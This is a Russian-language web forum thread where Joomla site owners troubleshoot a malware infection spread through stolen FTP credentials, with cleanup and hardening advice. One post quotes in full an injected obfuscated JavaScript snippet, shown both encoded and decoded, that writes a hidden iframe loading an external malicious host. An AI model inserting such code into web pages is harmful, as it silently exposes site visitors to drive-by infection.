Добрый день вот какая бадяга. Сайт перестал открываться через Internet Explorer. DrWeb при открытии пишет, что страница заражена вирусом. На других компах аналогичная ситуация. Грузится страница, но либо вообще нет изображения и контента, либо только до половины. Через Opera и Mozilla без проблем загружается. Ничего сам не трогал и не менял. Подскажите, какой файл может быть заражен вирусом и где искать? Как можно вылечить или удалить вирус на сервере? Спасибо.
Короче, у меня был заражен файл index.php троянчиком. Я просмотрел главные файлы, увидел, что index.php по непонятным причинам был изменен совсем недавно (дата создания файла была сентябрьской, скопировал этот файл на комп, пропустил через Drweb. Он этот файл, типа, вылечил. Вроде пока все работает. Так что и вам спасибо за совет и Доктору Вебу ))
Так Вы устранили следствие, а не причину. Может быть рецидив. Желательно обновить Joomla! до последней стабильной версии, правильно выставить права на файлы, сменить пароли на сайт и на фтп.
Народ, тоже в тему..... правда для 1.0.15 версии.. Заметил, что в шаблон и в конец файла index.php самой джумлы каким то образом был вставлен javascript следующего вида: <!-- o65 --><Script Language='Javascript'> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </Script><!-- c65 --> после дешифровки имеем следующее: <!-- o65 --><Script Language='Javascript'> <!-- document.write(unescape('<iframe src="http://rtdmns.net/parus/?t=28" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>')); //--> </Script><!-- c65 --> При чем на ВСЕХ моих сайтах под joomla. Вопрос: как от этого уберечься? PS Проверьте свои сайты на наличие данного кода.
Да мало ли как, если руки золотые, но растут из ж..... Почитать можно тут: http://www.securitylab.ru/vulnerability/ Вот самый честный хостер http://govnohost.info/ шутка
Извините, братцы, скорее всего тревога ложная, а я ламер баговый, похоже у меня троян доступы к фтп просто увел... Ситуевина следующая, видимо имея доступ на фтп некий троян сканирует все папки на фтп и всем файлам с именем index (не зависимо от расширения и местонахождения) прописывает свой скрипт по алгоритму: если есть тег body - прописываемся сразу за ним, иначе пишемся в конец файла. Еще раз сори за ложную тревогу.
Именно так и получается! Крадется акк и пасс к фтп-аккаунту и на автомате прописывается вредоносный код. Стоит простучать своего хостера на предмет ограничения в админку по IP у jino такое есть, другими словами никто не может войти кроме как со своего IP (указанного в файле в корневой папке как точно называется, не помню). Плюсы - Никто кроме тебя не зайдет в админку, минус - если IP адрес динамический, то не прокатит.
На форуме был плагин к админке, не зная секретного паса не войдешь. Хотя в вашем случае защищать нужно фтп
У меня тоже такая же фигня.. Я вот только не знаю что делать... Теперь то понятно что лимит IPшников поставлю, а вот что делать чтоб все сайты быстро восстановить? Попросить у хостера бэкапы и перезаписать все идексные файлы? Подскажите плизз!
